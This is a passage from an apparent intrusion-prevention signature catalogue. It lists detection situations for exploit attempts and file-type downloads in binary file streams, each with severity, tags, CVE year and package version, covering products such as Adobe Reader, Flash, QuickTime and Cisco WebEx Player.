Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Acrobat, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1110-5242
Last changed: sgpkg-ips-1110-5242
Vulnerability: Adobe-Acrobat-Imageconversion-Emfplusdrawbeziers-Information-Disclosure
Description:
Back to top

File-Binary_Adobe-Acrobat-Imageconversion-Emfplusdrawbeziers-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat 2017 detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Acrobat, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1093-5242
Last changed: sgpkg-ips-1093-5242
Vulnerability: Adobe-Acrobat-Imageconversion-Emfplusdrawbeziers-Out-Of-Bounds-Read
Description:
Back to top

File-Binary_Adobe-Acrobat-Pro-Heap-Buffer-Overflow-CVE-2014-0529

About this situation: An attempt to exploit a vulnerability in Adobe Acrobat detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Acrobat, CVE2014, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-584-5211
Last changed: sgpkg-ips-584-5211
Vulnerability: Adobe-Acrobat-Pro-Heap-Buffer-Overflow-CVE-2014-0529
Description:
Back to top

File-Binary_Adobe-Acrobat-Reader-Memory-Corruption-CVE-2017-2965

About this situation: An attempt to exploit a vulnerability in Adobe Acrobat Reader detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2017, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-840-5242
Last changed: sgpkg-ips-840-5242
Vulnerability: Adobe-Acrobat-Reader-Memory-Corruption-CVE-2017-2965
Description:
Back to top

File-Binary_Adobe-Acrobat-XPS-Font-Parsing-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat 2017 detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Acrobat, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1105-5242
Last changed: sgpkg-ips-1105-5242
Vulnerability: Adobe-Acrobat-XPS-Font-Parsing-Out-Of-Bounds-Read
Description:
Back to top

File-Binary_Adobe-Audition-Session-File-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Audition detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Audition, CVE2011, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Adobe-Audition-Session-File-Stack-Buffer-Overflow
Description:
Back to top

File-Binary_Adobe-Audition-Session-File-TRKM-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Audition detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Audition, CVE2011, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Adobe-Audition-Session-File-TRKM-Stack-Buffer-Overflow
Description:
Back to top

File-Binary_Adobe-Camera-Raw-Plugin-TIFF-Image-Processing-Buffer-Underflow

About this situation: An attempt to exploit a vulnerability in Adobe Systems Adobe Camera Raw Plug-In detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Photoshop, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-538-5211
Last changed: sgpkg-ips-538-5211
Vulnerability: Adobe-Camera-Raw-Plugin-TIFF-Image-Processing-Buffer-Underflow
Description:
Back to top

File-Binary_Adobe-DNG-Software-Development-Kit-Decodeimage-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in Adobe Systems DNG Software Development Kit detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Systems DNG Software Development Kit, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1254-5242
Last changed: sgpkg-ips-1258-5242
Vulnerability: Adobe-DNG-Software-Development-Kit-Decodeimage-Out-Of-Bounds-Read
Description:
Back to top

File-Binary_Adobe-DNG-Software-Development-Kit-Readunvar10ed-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Systems var6 Software Development Kit
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Systems DNG Software Development Kit, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1260-5242
Last changed: sgpkg-ips-1264-5242
Vulnerability: Adobe-DNG-Software-Development-Kit-Readuncompressed-Heap-Buffer-Overflow
Description:
Back to top

File-Binary_Adobe-Flash-Exploit-CVE-2011-0609

About this situation: Detected attempt to exploit a vulnerability in Adobe Flash
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2011, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-657-5211
Last changed: sgpkg-ips-657-5211
Vulnerability: Adobe-Flash-Vulnerability-CVE-2011-0609
Description:
Back to top

File-Binary_Adobe-Flash-Exploit-CVE-2011-0611

About this situation: Detected attempt to exploit a vulnerability in Adobe Flash
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2011, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-657-5211
Last changed: sgpkg-ips-657-5211
Vulnerability: Adobe-Flash-Vulnerability-CVE-2011-0611
Description:
Back to top

File-Binary_Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4141

About this situation: An attempt to exploit a vulnerability in Adobe Flash detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Flash Player, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-772-5211
Last changed: sgpkg-ips-772-5211
Vulnerability: Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4141
Description:
Back to top

File-Binary_Adobe-Flash-Mp3-Id3-Tag-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Systems AIR desktop runtime detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, Adobe Systems AIR, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-681-5211
Last changed: sgpkg-ips-681-5211
Vulnerability: Adobe-Flash-Mp3-Id3-Tag-Integer-Overflow
Description:
Back to top

File-Binary_Adobe-Flash-Player-CVE-2017-2927

About this situation: An attempt to exploit a vulnerability in Adobe Flash
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Flash Player, CVE2017, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-840-5242
Last changed: sgpkg-ips-840-5242
Vulnerability: Adobe-Flash-Player-CVE-2017-2927
Description:
Back to top

File-Binary_Adobe-Flash-Player-CVE-2017-2934

About this situation: An attempt to exploit a vulnerability in Adobe Flash
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Flash Player, CVE2017, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-840-5242
Last changed: sgpkg-ips-840-5242
Vulnerability: Adobe-Flash-Player-CVE-2017-2934
Description:
Back to top

File-Binary_Adobe-Multiple-Products-BMP-Image-Header-Handling-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Systems Adobe Photoshop detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Photoshop, Adobe After Effects, Adobe Photoshop Album Starter, CVE2008, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-670-5211
Vulnerability: Adobe-Multiple-Products-BMP-Image-Header-Handling-Buffer-Overflow
Description:
Back to top

File-Binary_Adobe-Photoshop-TIFF-Parsing-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Systems Adobe Photoshop CS5.1 detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Photoshop, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-503-5211
Last changed: sgpkg-ips-503-5211
Vulnerability: Adobe-Photoshop-TIFF-Parsing-Heap-Buffer-Overflow
Description:
Back to top

File-Binary_Adobe-Reader-BMP-Multiple-Vulnerabilities

About this situation: An attempt to exploit a vulnerability in Adobe Reader detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Reader, CVE2011, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-412-4219
Last changed: sgpkg-ips-412-4219
Vulnerability: Adobe-Reader-BMP-Vulnerability-2011-2438a
Adobe-Reader-BMP-Vulnerability-2011-4372
Description:
Back to top

File-Binary_Adobe-Reader-BMP-Vulnerability-2011-2438c

About this situation: An attempt to exploit a vulnerability in Adobe Reader detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Reader, CVE2011, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-412-4219
Last changed: sgpkg-ips-412-4219
Vulnerability: Adobe-Reader-BMP-Vulnerability-2011-2438c
Description:
Back to top

File-Binary_Adobe-Reader-CVE-2017-2966

About this situation: An attempt to exploit a vulnerability in Adobe Reader
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Reader, CVE2017, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-840-5242
Last changed: sgpkg-ips-840-5242
Vulnerability: Adobe-Reader-Player-CVE-2017-2966
Description:
Back to top

File-Binary_Adobe-Reader-Memory-Corruption-CVE-2017-3036

About this situation: An attempt to exploit a vulnerability in Adobe Reader detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2017, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-877-5242
Last changed: sgpkg-ips-877-5242
Vulnerability: Adobe-Reader-Memory-Corruption-CVE-2017-3036
Description:
Back to top

File-Binary_Adobe-Reader-Security-Bypass-CVE-2013-0624

About this situation: Attempt to exploit vulnerability in Adobe Reader
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2013, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-504-5211
Last changed: sgpkg-ips-1798-5242
Vulnerability: Adobe-Reader-Security-Bypass-CVE-2013-0624
Description:
Back to top

File-Binary_Advantech-Adamview-Conditional-Bitmap-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Advantech AdamView detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech AdamView, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-623-5211
Vulnerability: Advantech-Adamview-Conditional-Bitmap-Remote-Code-Execution
Description:
Back to top

File-Binary_Advantech-Adamview-Display-Properties-Parameter-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Advantech AdamView detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech AdamView, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-623-5211
Vulnerability: Advantech-Adamview-Display-Properties-Parameter-Remote-Code-Execution
Description:
Back to top

File-Binary_AntiVirus-ACE-File-Handling-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in ACE file handling detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Avast Antivirus, HAURI Antivirus, CVE2005, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-607-5211
Last changed: sgpkg-ips-607-5211
Vulnerability: Avast!-AntiVirus-ACE-File-Handling-Buffer-Overflow
Hauri-AntiVirus-ACE-Archive-Handling-Buffer-Overflow
Description:
Back to top

File-Binary_AntiVirus-ACE-File-Handling-Buffer-Overflow-2

About this situation: An attempt to exploit a vulnerability in ACE file handling detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Avast Antivirus, HAURI Antivirus, CVE2005, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-679-5211
Last changed: sgpkg-ips-679-5211
Vulnerability: Avast!-AntiVirus-ACE-File-Handling-Buffer-Overflow
Hauri-AntiVirus-ACE-Archive-Handling-Buffer-Overflow
Description:
Back to top

File-Binary_Apache-Dubbo-Httpremoteinvocation-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Dubbo detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Dubbo, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1242-5242
Last changed: sgpkg-ips-1612-5242
Vulnerability: Apache-Dubbo-Httpremoteinvocation-Insecure-Deserialization
Description:
Back to top

File-Binary_Apache-OpenOffice-Dbase-File-Handling-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation OpenOffice detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache OpenOffice, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1393-5242
Last changed: sgpkg-ips-1393-5242
Vulnerability: Apache-OpenOffice-Dbase-File-Handling-Buffer-Overflow
Description:
Back to top

File-Binary_Apache-Solr-Configsets-Arbitrary-File-Upload-CVE-2023-50386

About this situation: An attempt to exploit a vulnerability in Apache Solr detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Solr, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1714-5242
Last changed: sgpkg-ips-1714-5242
Vulnerability: Apache-Solr-Configsets-Arbitrary-File-Upload-CVE-2023-50386
Description:
Back to top

File-Binary_Apache-Tika-Chmparser-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Apache Tika detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Tika, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1069-5242
Last changed: sgpkg-ips-1069-5242
Vulnerability: Apache-Tika-Chmparser-Denial-Of-Service
Description:
Back to top

File-Binary_Apache-Tomcat-Insecure-Deserialization-CVE-2025-24813

About this situation: An attempt to exploit a vulnerability in Apache Tomcat detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Tomcat, CVE2025, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1852-5242
Last changed: sgpkg-ips-1852-5242
Vulnerability: Apache-Tomcat-Insecure-Deserialization-CVE-2025-24813
Description:
Back to top

File-Binary_Apple-Computer-Finder-Dmg-Volume-Name-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Apple Mac OS X Finder detected
Context: Other Binary File Stream
Severity: 7
Tags: Mac OS X, Any Hardware, CVE2007, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-622-5211
Vulnerability: Apple-Finder-Dmg-Volume-Name-Memory-Corruption
Description:
Back to top

File-Binary_Apple-Dmg-Disk-Image

About this situation: Apple DMG disk image file download detected
Context: Other Binary File Stream
Severity: 2
Tags: Mac OS X, Any Hardware, Possibly Unwanted Content, Archive
First detected in: sgpkg-ips-591-5211
Last changed: sgpkg-ips-1352-5242
Vulnerability: File-Type-Identification
Description:
Back to top

File-Binary_Apple-iOS-Libtiff-Buffer-Overflow

About this situation: An attempt to exploit an Apple iOS Libtiff Buffer Overflow vulnerability detected
Context: Other Binary File Stream
Severity: 7
Tags: Mac OS X, Any Hardware, Apple iPhone Firmware, CVE2006, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-800-5242
Last changed: sgpkg-ips-803-5242
Vulnerability: Apple-iOS-Libtiff-Buffer-Overflow
Description:
Back to top

File-Binary_Apple-Mac OS X-ImageIO-Psd-File-Parsing-Heap-Buffer-Overflow-CVE-2024-40777

About this situation: An attempt to exploit a vulnerability in Apple Computer macOS Sonoma detected
Context: Other Binary File Stream
Severity: 7
Tags: Mac OS X, Any Hardware, CVE2024, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1857-5242
Last changed: sgpkg-ips-1857-5242
Vulnerability: Apple-MacOS-ImageIO-Psd-File-Parsing-Heap-Buffer-Overflow-CVE-2024-40777
Description:
Back to top

File-Binary_Apple-QuickDraw-GetSrcBits32ARGB-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Apple Mac OS X detected.
Context: Other Binary File Stream
Severity: 7
Tags: Mac OS X, Any Hardware, CVE2007, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-760-5211
Vulnerability: Apple-QuickDraw-GetSrcBits32ARGB-Memory-Corruption
Description:
Back to top

File-Binary_Apple-QuickTime-BMP-Handling-Buffer-Overflow

About this situation: Exploit against buffer overflow vulnerability in Apple QuickTime's BMP image handling
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2006, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Apple-QuickTime-BMP-Handling-Buffer-Overflow
Description:
Back to top

File-Binary_Apple-QuickTime-Flic-Animation-File-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Apple QuickTime detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2006, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Apple-QuickTime-Flic-Animation-File-Buffer-Overflow
Description:
Back to top

File-Binary_Apple-QuickTime-Pict-File-Processing-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Apple QuickTime detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-461-5211
Last changed: sgpkg-ips-461-5211
Vulnerability: Apple-QuickTime-Pict-File-Processing-Memory-Corruption
Description:
Back to top

File-Binary_Apple-QuickTime-Pict-Image-Paintpoly-Parsing-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Apple QuickTime detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2009, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Apple-QuickTime-Pict-Image-Paintpoly-Parsing-Heap-Buffer-Overflow
Description:
Back to top

File-Binary_Apple-QuickTime-Psd-File-Parsing-CVE-2016-1769-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Apple Computer Quicktime detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2016, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-756-5211
Last changed: sgpkg-ips-759-5211
Vulnerability: Apple-QuickTime-Psd-File-Parsing-CVE-2016-1769-Memory-Corruption
Description:
Back to top

File-Binary_Apple-QuickTime-Targa-File-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Apple Computer QuickTime detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-494-5211
Last changed: sgpkg-ips-973-5242
Vulnerability: Apple-QuickTime-Targa-File-Buffer-Overflow
Description:
Back to top

File-Binary_Apple-XAR-Archive-Parsing-Arbitrary-File-Write-Vulnerability

About this situation: An attempt to exploit a vulnerability in Apple Computer XAR detected
Context: Other Binary File Stream
Severity: 7
Tags: Mac OS, Any Hardware, CVE2021, Mac OS not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1409-5242
Last changed: sgpkg-ips-1409-5242
Vulnerability: Apple-XAR-Archive-Parsing-Arbitrary-File-Write-Vulnerability
Description:
Back to top

File-Binary_Apple-XAR-Archive-Symlink-Parsing-Arbitrary-File-Write-Vulnerability

About this situation: An attempt to exploit a vulnerability in Apple Computer XAR detected
Context: Other Binary File Stream
Severity: 7
Tags: Mac OS X, Any Hardware, CVE2022, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1462-5242
Last changed: sgpkg-ips-1462-5242
Vulnerability: Apple-XAR-Archive-Symlink-Parsing-Arbitrary-File-Write-Vulnerability
Description:
Back to top

File-Binary_Ar-Archive

About this situation: Ar archive file download detected
Context: Other Binary File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Ar, Any Operating System not specific, Possibly Unwanted Content, Archive
First detected in: sgpkg-ips-591-5211
Last changed: sgpkg-ips-591-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-Binary_ARJ-Archive

About this situation: Arj archive file download detected
Context: Other Binary File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Arj, Any Operating System not specific, Possibly Unwanted Content, Archive
First detected in: sgpkg-ips-591-5211
Last changed: sgpkg-ips-759-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-Binary_ARJ-Archive-Long-Local-File-Header-7-Zip-BOF

About this situation: Detects malformed ARJ archives that could cause a buffer overflow in 7-Zip
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, 7-Zip, CVE2005, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: ARJ-Archive-Long-Local-File-Header-7-Zip-BOF
Description:
Back to top

File-Binary_Autodesk-Animation-Flic-Video

About this situation: Autodesk Flic video download detected
Context: Other Binary File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Autodesk Animator, Any Operating System not specific, Possibly Unwanted Content, Media File
First detected in: sgpkg-ips-591-5211
Last changed: sgpkg-ips-591-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-Binary_Autodesk-Autocad-DWF

About this situation: Autodesk AutoCAD DWF image download detected
Context: Other Binary File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Autodesk AutoCAD, Any Operating System not specific, Possibly Unwanted Content, Media File
First detected in: sgpkg-ips-591-5211
Last changed: sgpkg-ips-591-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-Binary_Autodesk-Autocad-DWG

About this situation: Autodesk AutoCAD DWG image download detected
Context: Other Binary File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Autodesk AutoCAD, Any Operating System not specific, Possibly Unwanted Content, Media File
First detected in: sgpkg-ips-591-5211
Last changed: sgpkg-ips-591-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-Binary_Autodesk-Autocad-FAS

About this situation: Autodesk AutoCAD FAS file download detected
Context: Other Binary File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Autodesk AutoCAD, Any Operating System not specific, Possibly Unwanted Content, Program File
First detected in: sgpkg-ips-591-5211
Last changed: sgpkg-ips-591-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-Binary_Avast-AntiVirus-Engine-Lha-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in ALWIL Software Avast Antivirus detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Avast Antivirus, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-435-4219
Vulnerability: Avast-AntiVirus-Engine-Remote-Lha-Buffer-Overflow
Description:
Back to top

File-Binary_Blizzard-MPQ-Archive

About this situation: MPQ archive file download detected
Context: Other Binary File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Blizzard MPQ, Any Operating System not specific, Possibly Unwanted Content, Archive
First detected in: sgpkg-ips-591-5211
Last changed: sgpkg-ips-591-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-Binary_BZip2-Compressed-File-Download

About this situation: Attempt to download bzip2 compressed file detected
Context: Other Binary File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, bzip2, Any Operating System not specific, Possibly Unwanted Content, Archive
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-591-5211
Vulnerability: BZip2-Compressed-File
File-Type-Identification
Description:
Back to top

File-Binary_CD-ROM-Disk-Image

About this situation: CD-ROM disk image file download detected
Context: Other Binary File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content, Archive
First detected in: sgpkg-ips-591-5211
Last changed: sgpkg-ips-591-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-Binary_Chasys-Draw-IES-BMP-Image-Processing-Buffer-Overflow

About this situation: Chasys Draw IES BMP Image Processing Buffer Overflow detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Chasys Draw, CVE2013, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-570-5211
Last changed: sgpkg-ips-570-5211
Vulnerability: Chasys-Draw-IES-BMP-Image-Processing-Buffer-Overflow
Description:
Back to top

File-Binary_Cisco-UCS-Director-Copyfilerunnable-Run-Symlink-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Cisco UCS Director detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco UCS Director, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1267-5242
Last changed: sgpkg-ips-1267-5242
Vulnerability: Cisco-UCS-Director-Copyfilerunnable-Run-Symlink-Remote-Code-Execution
Description:
Back to top

File-Binary_Cisco-Webex-Player-Atas32.dll-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Cisco Systems WebEx Player detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Webex Player, CVE2011, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-427-4219
Last changed: sgpkg-ips-429-4219
Vulnerability: Cisco-Webex-Player-Atas32.dll-Remote-Code-Execution
Description:
Back to top

File-Binary_Cisco-Webex-Player-BOF

About this situation: An attempt to exploit a vulnerability in Cisco Systems WebEx Player detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Webex Player, CVE2010, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-410-4219
Vulnerability: Cisco-Webex-Player-.wrf-Stack-Buffer-Overflow
Description:
Back to top

File-Binary_Cisco-Webex-Recording-Format-Player-Atas32.dll-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Cisco Systems WebEx Player detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Webex Player, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-454-4333
Last changed: sgpkg-ips-456-5211
Vulnerability: Cisco-Webex-Recording-Format-Player-Atas32.dll-Integer-Overflow
Description:
Back to top

File-Binary_Cisco-Webex-Recording-Format-Player-Atas32.dll-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Cisco Systems WebEx Player detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Webex Player, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-499-5211
Last changed: sgpkg-ips-499-5211
Vulnerability: Cisco-Webex-Recording-Format-Player-Atas32.dll-Memory-Corruption
Description:
Back to top

File-Binary_Cisco-Webex-Recording-Format-Player-Atas32.dll-Subrecords-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Cisco Systems WebEx Player detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Webex Player, CVE2012, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-972-5242
Last changed: sgpkg-ips-974-5242
Vulnerability: Cisco-Webex-Recording-Format-Player-Atas32.dll-Subrecords-Integer-Overflow
Description:
Back to top

File-Binary_Cisco-Webex-Recording-Format-Player-Atdl2006.dll-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Cisco Systems WebEx Player detected
Context: Other Binary File Stream
Severity: 7
